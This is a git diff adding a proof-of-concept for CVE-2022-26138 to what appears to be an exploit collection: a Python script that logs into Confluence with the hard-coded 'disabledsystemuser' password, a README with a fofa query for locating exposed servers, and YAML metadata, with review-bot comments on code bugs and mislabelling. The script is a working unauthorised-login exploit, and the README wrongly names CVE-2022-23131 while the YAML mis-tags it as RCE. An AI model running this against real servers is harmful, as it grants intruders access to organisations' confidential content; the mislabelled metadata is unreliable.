diff --git a/cve/confluence/2022/CVE-2022-26138/CVE-2022-26138.py b/cve/confluence/2022/CVE-2022-26138/CVE-2022-26138.py
new file mode 100644
index 0000000000000000000000000000000000000000..2553d28b54d30abf0e959fe7ea0e28b2b9cb024f
--- /dev/null
+++ b/cve/confluence/2022/CVE-2022-26138/CVE-2022-26138.py
@@ -0,0 +1,39 @@
+import time
+
+import requests
+def sendPayload(uri):
+ url="http://"+uri+"/dologin.action"
+ headers={
+ 'Connection': 'close',
+ 'Cache-Control': 'max-age=0',
+ 'Upgrade-Insecure-Requests': '1',
+ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
+ 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+ 'Accept-Encoding': 'gzip, deflate',
+ 'Accept-Language': 'zh-CN,zh;q=0.8',
+ 'Content-Type':'application/x-www-form-urlencoded'
+ }
+ data="os_username=disabledsystemuser&os_password=disabled1system1user6708&login=%E7%99%BB%E5%BD%95&os_destination=%2Findex.action"
+ try:
+ res = requests.post(url=url,headers=headers,allow_redirects=False,data=data,timeout=20)
+ print(url)
+ return res
+ except requests.exceptions.ConnectionError:
+ print('ConnectionError -- please wait 3 seconds')
+ time.sleep(3)
+ except requests.exceptions.ChunkedEncodingError:
+ print('ChunkedEncodingError -- please wait 3 seconds')
+ time.sleep(3)
+ except:
+ print('Unfortunitely -- An Unknow Error Happened, Please wait 3 seconds')
+ time.sleep(3)
+ return res
+def checkResult(res):
+ result="/"
+ if res.status_code == 302:
+ if result in res.headers['location']:
+ print('存在此漏洞')
+
+if __name__ == '__main__':
+ res = sendPayload("localhost:8090")
+ checkResult(res)
\ No newline at end of file
diff --git a/cve/confluence/2022/CVE-2022-26138/README.md b/cve/confluence/2022/CVE-2022-26138/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..4163878ff06b6bfdcf84ebcde0a57fd2c12d5b80
--- /dev/null
+++ b/cve/confluence/2022/CVE-2022-26138/README.md
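Review bot: In `sendPayload` of CVE-2022-26138.py, every `except` branch falls through to the final `return res`, but `res` is bound only when `requests.post` succeeds, so an unreachable host ends in `UnboundLocalError` rather than a clean "no result"; return `None` there and have `checkResult` begin with `if res is None: return`. The bare `except:` also traps `KeyboardInterrupt`, and `except requests.exceptions.RequestException:` would cover the two named request errors as well. In `checkResult`, `"/" in res.headers['location']` is true for practically any 302, so a redirect issued by a reverse proxy or SSO gateway would be reported as vulnerable, and a 302 without that header raises `KeyError`; a tighter test against the requested destination, for example `res.headers.get('Location', '').endswith('/index.action')`, avoids both. Printing an explicit negative result in the other case would let someone verifying a remediated instance tell "not affected" apart from "check did not run".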
@@ -0,0 +1,7 @@
+# CVE-2022-26138
+
+CVE-2022-23131 - SAML SSO bypass
+
+```
+fofa: icon_hash="-305179312"
+```
\ No newline at end of file
diff --git a/cve/confluence/2022/yaml/CVE-2022-26138.yaml b/cve/confluence/2022/yaml/CVE-2022-26138.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..d399d06b0dcfa01f9c0ce30e31a678cad9699ec4
--- /dev/null
+++ b/cve/confluence/2022/yaml/CVE-2022-26138.yaml
@@ -0,0 +1,23 @@
+id: CVE-2022-26138
+source:
+ https://github.com/shavchen/CVE-2022-26138
+info:
+ name: Confluence是atlassian公司的产品,是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。
+ severity: critical
+ description: |
+ 用于Confluence服务器和数据中心的Atlassian Questions For Confluence应用程序在Confluence -users组中创建了一个Confluence用户帐户,用户名为disabledsystemuser,密码为硬编码。了解硬编码密码的远程、未经身份验证的攻击者可以利用这一点登录到Confluence并访问Confluence -users组中用户可访问的所有内容。
+ scope-of-influence:
+ Confluence Server&Data Center 2.7.34
+ Confluence Server&Data Center 2.7.35
+ Confluence Server&Data Center 3.0.2
+ reference:
+ - https://nvd.nist.gov/vuln/detail/cve-2022-26138
+ - https://confluence.atlassian.com/confkb/what-is-the-purpose-of-disabledsystemuser-account-on-confluence-1087511405.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-26138
+ cwe-id: CWE-798
+ cnvd-id: None
+ kve-id: None
+ tags: RCE,cve2022
\ No newline at end of file
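Review bot: `tags: RCE,cve2022` in CVE-2022-26138.yaml mislabels the finding, since the description and `cwe-id: CWE-798` both describe a hard-coded credential that allows login as a confluence-users member, not code execution; a tag along the lines of `tags: hardcoded-credentials,cve2022` would keep triage and filtering accurate. The `scope-of-influence` entries give 2.7.34, 2.7.35 and 3.0.2 as "Confluence Server&Data Center" versions, but these look like versions of the Questions for Confluence app named in the description, so they should be confirmed against the linked Atlassian page and relabelled. `info.name` holds a general product blurb where the vulnerability name is expected. Separately, README.md in this commit summarises the issue as `CVE-2022-23131 - SAML SSO bypass` under a CVE-2022-26138 heading; that line should describe the hard-coded `disabledsystemuser` account instead.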